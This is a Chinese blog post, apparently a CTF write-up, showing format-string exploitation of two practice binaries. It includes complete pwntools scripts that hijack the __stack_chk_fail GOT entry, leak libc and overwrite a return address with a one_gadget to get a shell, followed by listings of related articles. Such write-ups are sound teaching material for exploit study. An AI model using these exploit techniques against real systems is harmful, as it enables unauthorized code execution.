栈上格式化字符串漏洞修改stack_checkfail

已于 2024-02-22 16:18:40 修改
阅读量272 收藏 1
点赞数 3
文章标签: 安全
于 2024-02-21 19:22:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81031055/article/details/136218480
版权

 栈上格式化字符串漏洞修改stack_checkfail

 checksec指令查看

用64位IDA打开分析

 从IAD中我们可以看出它存在栈溢出,格式化字符串漏洞,还有canary保护,我们无法直接利用栈溢出。

我们知道canary保护开启之后,会产生随机数值,如果修改的话程序就会自动退出,这里程序自动退出就是靠stack_chk_fail函数

我们可以利用格式化字符串漏洞去修改stack_chk_fail函数的got表使得程序继续进行,在这里,我们将stack_chk_fail函数改成fmt函数,然后通过格式化字符串漏洞去泄露libc基址

先找到偏移为6

再通过pay=fmtstr_payload(偏移,{要改的内容:改成什么东西})

到这里stack_chk_fail函数的got表已经修改成功

接下来通过read函数将printf函数的got表读入程序里面

这一行pay=(b'%7$saaaa'+p64(elf.got['printf'])).ljust(0x100,b'\x00')后面的.ljust(0x100,b'\x00')是因为读入的字节较少,不足以覆盖canary的数值,所以在任意读入较大的数值就行

下面就是去泄露libc的基址然后通过one_gadget库去获取权限

因为

所以这里仍然选择r15,rdx为空的偏移

到这里本地调试就打通啦!

 脚本如下:

from pwn import*
context(os='linux',arch='amd64',log_level='debug')
p=process("./pwn3")
elf=ELF("./pwn3")
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
def bug():
	gdb.attach(p)
	pause()

pay=fmtstr_payload(6,{elf.got['__stack_chk_fail']:(0x4011DD)})
bug()
p.send(pay)


pause()
pay=(b'%7$saaaa'+p64(elf.got['printf'])).ljust(0x100,b'\x00')
p.send(pay)


read_addr=u64(p.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))
print(hex(read_addr))
libc_base=read_addr-libc.sym['printf']
print(hex(libc_base))
one_gadget=libc_base+0xe3b01

pause()
pay=fmtstr_payload(6,{elf.got['__stack_chk_fail']:(one_gadget)})
p.send(pay)
p.interactive()

 栈上格式化字符串漏洞修改返回地址为one_gadget

 

checksec指令查看,64位,保护全开

IDA分析

在IDA中我们可以发现有stack_chk_fail函数,但是跟上面的题不同,因为保护全开,我们无法修改stack_chk_fail函数的got表

在这里我们可以看到程序发送'yes'之后会打印出printf函数的地址,这样就可以找出libc基址以及栈地址,我们可以想到利用格式化字符串漏洞修改返回地址为one_gadget

修改返回地址为one_gadge的条件是得有libc基址以及栈地址

这里就会打印出libc基址以及栈地址

接收之后,我们可以通过计算找出函数的偏移,然后找出函数的返回地址

最后就是将返回地址修改为one_gadget

 

脚本如下:

from pwn import*
context(os='linux',arch='amd64',log_level='debug')
p=process("./pwn4")
elf=ELF("./pwn4")
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
def bug():
	gdb.attach(p)
	pause()

p.recvuntil('lbs 6 or not 6\n')
p.send(str('yes'))


p.recvuntil('0x')
libc_base=int(p.recv(12),16)-libc.sym['printf']

print(hex(libc_base))
one_gadget=libc_base+0xe3b01

p.recvuntil('0x')
stack=int(p.recv(12),16)+296


print(hex(stack))


bug()
pay=fmtstr_payload(6,{stack:one_gadget})
p.send(pay)




p.interactive()

☜.♡.☞
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
__stack_chk_fail问题分析
风之伤
02-24 1714
再说一下,canary破坏很大可能是memset memcpy越界修改造成的,而且是中的变量,如下static概率就比较小,因为static变量不在中,所以,大概率是tmp这个数组。,canary存放位置如下,如果func1函数中有越界操作,很可能会修改到canary,stack_chk_fail检测canary就会失败。所以大概率问题出现在32行的memcpy,p2-p1可能越界了,因为tmp与stlog大小一样,tmp在开头加了一断字符,p2-p1+l。发生了缓冲区溢出,canary被破坏。
GDB调试之指针破坏
明何
09-14 1万+
记录一个因为上非法操作导致指针被破坏的例子。 源代码如下: #include #include char name[] = "aabbccddeeffgghhiijjkkllmmnnooppqqrrsstt"; void fun() { char buf[3]; strcpy(buf, name); } int main(void) { fun();
格式化字符串漏洞:泄露canary,修改got表,stack check fail,one_gadget
2302_79813730的博客
02-05 565
此时就存在格式化字符串漏洞。%c为单个字符形式%s为多个字符形式%d为数字形式%f是转为浮点型%x是转为十六进制形式,不带0x%p是转为十六进制,但是带0x%n 将%n之前打印出来的字符的个数存入到参数中接下通过例题来讲解利用方法。
__stack_chk_fail检查失败
热门推荐
青梅煮酒的专栏
06-06 2万+
1. __stack_chk_fail的作用 在了函数的局部变量和保存的指令指针(译注:此处指返回地址和EBP)之间。这个值被称作金丝雀(“canary”)值 参考 http://www.freebuf.com/articles/system/24177.html 2. 发生原因及原理 数组越界写入,导致 canary值被修改。在函数退出时检查canary,发现canar
【GDB】__stack_chk_fail 溢出问题定位
pcj_888的博客
12-16 1万+
一、问题描述 进程收到SIGABRT信号异常退出,异常调用显示__stack_chk_fail 二、原因分析和定位思路 原因分析: __stack_chk_fail说明发生了缓冲区溢出,canary被破坏。这说明代码设置GCC编译选项fstack-protector,开启了保护机制canary 定位思路: 先通过反汇编找到canary在上的存放地址。 用GDB对canary的存放地址打数据断点,定位出导致破坏的指令,再结合C代码具体分析。 三、定位过程 以下给出一个简化案例:一个可执行程序tes
溢出 __stack_chk_fail
tianyexing2008的博客
08-13 806
今天在调试多进程时,发现有一个进程崩溃了,打印堆如: 在调用本地接口reportHashSTL后,进到c库接口__stack_chk_fail,上网搜索了一下,这个错误表示溢出,一般是数组越界写入导致,__stack_chk_fail相关的可自行网上搜索。这里记录排查过程。 1,首先是找到调用源码,如下: 注意这里数组大小为84。 2,reportHash 源码片段,如下: 一开始以为是for循环里循环次数太大导致入参tszTemp不够装下,但第一次加打印时mInternal-&gt.
编译遇到“__stack_chk_fail_local”错误
pk_20140716的专栏
11-19 1112
若在ubuntu上编译代码遇到”__stack_chk_fail_local”错误时,在makefile CFLAGS中加入”-fno-stack-protector”注意是在gcc编译时加上参数,不是在ld链接时加上
Canary机制及绕过策略-格式化字符串漏洞泄露Canary
02-24
我们知道,在32位系统上,对于溢出漏洞,攻击者通常是通过溢出缓冲区,覆盖上保存的函数返回地址来达到劫持程序执行流的目的。Stackcanary保护机制在刚进入函数时,在上放置一个标志canary,然后在函数结束...
GPRS.zip_LPC2103_MC55 tcp_Stack_tcp串口_原理图
09-20
标题中的"GPRS.zip_LPC2103_MC55 tcp_Stack_tcp串口_原理图"揭示了这个压缩包文件包含的关键技术元素,主要涉及GPRS通信、LPC2103微控制器、MC55模块、TCP/IP协议以及串行通信的原理图设计。以下是对这些知识点的...
LIN_stack_S12_4_6_6_210629.exe
09-09
NXP 的 LIN 协议,之前一直用的 4.5.7 的版本,使用过程中有好几个问题都是手动修复的。最近在官网上看见了 4.6.6 的版本,下载测试了一遍,发现之前手动修复的几个问题都已经 OK 了。
C++中用来判断括号字符串匹配问题的实现方法
09-04
在C++编程中,解决括号字符串匹配问题是一种常见的算法挑战,主要涉及到数据结构中的。本篇将详细解析如何利用来判断一个由各种括号组成的字符串是否正确匹配。 首先,我们需要理解(Stack)的基本特性。是...
Stack__
10-03
1. 括号匹配:通过维护一个字符,遇到左括号就入,遇到右括号时检查顶元素是否是对应左括号,若是则出,否则表示括号不匹配。 2. 深度优先搜索(DFS):在图或树的遍历中,常用于实现后序遍历,每次访问一...
[exploit][writeup]0ctf2015 flagen - Canary绕过之__stack_chk_fail劫持
weixin_34133829的博客
02-20 645
本题为Linux溢出漏洞的利用,考查Linux Canary绕过技术及ROP(Return-Oriented-Programming)攻击负载的构造。 0x01 Linux Canary介绍首先了解一下Linux的Canary保护机制。Canary是Linux众多安全保护机制中的一种,主要用于防护溢出攻击。我们知道,在32位系统上,对于溢出漏洞,攻击者通常是通过溢出缓冲区,覆盖上保存的...
wdb2018_guess-___stack_chk_fail泄露信息
qq_40712959的博客
11-03 377
背景知识 在程序添加了canary保护后,如果我们读取的bof覆盖了对应的值时,程序就会报错,我们可以利用报错信息。 程序在启动canary保护之后,如果发现canary被修改的话,程序就会执行__stack_chk_fail函数来打印argv[0]指针所指向的字符串,正常情况下,这个指针指向程序名。很简单,只要我们可以控制argv[0],就能知道我们想知道的信息。 void __attribute__ ((noreturn)) __stack_chk_fail (void) { __forti
__stack_chk_fail之帧溢出检测技术
03-01 1083
一.参考文章 (52条消息) canary介绍与绕过技巧_0pt1mus-CSDN博客_canary绕过https://blog.csdn.net/weixin_43713800/article/details/105273284 (52条消息) 【GDB】__stack_chk_fail 溢出问题定位_pcj_888的博客-CSDN博客___stack_chk_fail定位手段https://blog.csdn.net/pcj_888/article/details/111305718#:~:te.
__stack_chk_fail问题及解决方案
qq_39864882的博客
03-05 7289
遇到的问题: 程序在进入ComputeMisclosures()函数后,执行到函数结尾的括号处出现如下错误: *** stack smashing detected ***: < unknown > terminated Signal: SIGABRT (Aborted) 调试窗口显示:__stack_chk_fail 在网上找资料,出现__stack_chk_fail是因为发生了溢出,引起溢出可能有:1)数组越界,2)sprintf()、memcpy()、strcpy()等函数,3)写
格式化字符串漏洞
2301_79880752的博客
02-04 794
开启NX、Canary保护,64位,动态编译,IDA分析:很明显存在格式化字符串漏洞,同时左边还有__stack_chk_fail函数随机生成canary被改变后会退出程序,那它如何退出的呢,就是通过执行__stack_chk_fail函数退出程序既然题目给了我们__stack_chk_fail函数的地址,又存在格式化字符串漏洞,那我们就可以通过fmtstr_payload(偏移,{被修改的got表:改之后的地址})
格式化字符串漏洞总结
weixin_66751120的博客
02-04 2430
例如printf(s),这就是个漏洞函数,那么正确形式应该是printf('%s',s),即以字符串形式输出,那么存在漏洞的原因就是就是没有格式化字符,这时候如果我们在漏洞函数上边输入一个格式化字符,比如%p,那么就会泄露指定位置的地址。因为当程序进行printf函数时,第一个参数是格式化字符,来确定下面一个数据的打印形式。下面是一些格式化字符代表的意思。
构建稳固与安全的网络环境:从微软蓝屏事件中的教训学习
最新发布
xingyu_qie的专栏
07-22 803
微软蓝屏”事件为我们提供了宝贵的教训和警示,即使是最大的科技公司也难以完全避免软件缺陷带来的灾难性后果。建设一个稳固和安全的网络环境需要多方面的努力:从有效的软件更新管理到强化的紧急响应能力,再到全员安全意识的培养和文化建设。只有综合运用技术、流程和人员培训,我们才能更好地应对未来可能出现的类似挑战,保护我们的数字基础设施和社会运行的稳定性与安全性。
ipa在win10使用IDA检测是否开启 ___stack_chk_fail 以及 ___stack_chk_guard
06-08
在 Windows 应用程序中,___stack_chk_fail 和 ___stack_chk_guard 都是 GCC 编译器的安全特性。___stack_chk_guard 是一个随机值,它被插入到应用程序的中,用于检测缓冲区溢出攻击。而 ___stack_chk_fail 是一个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值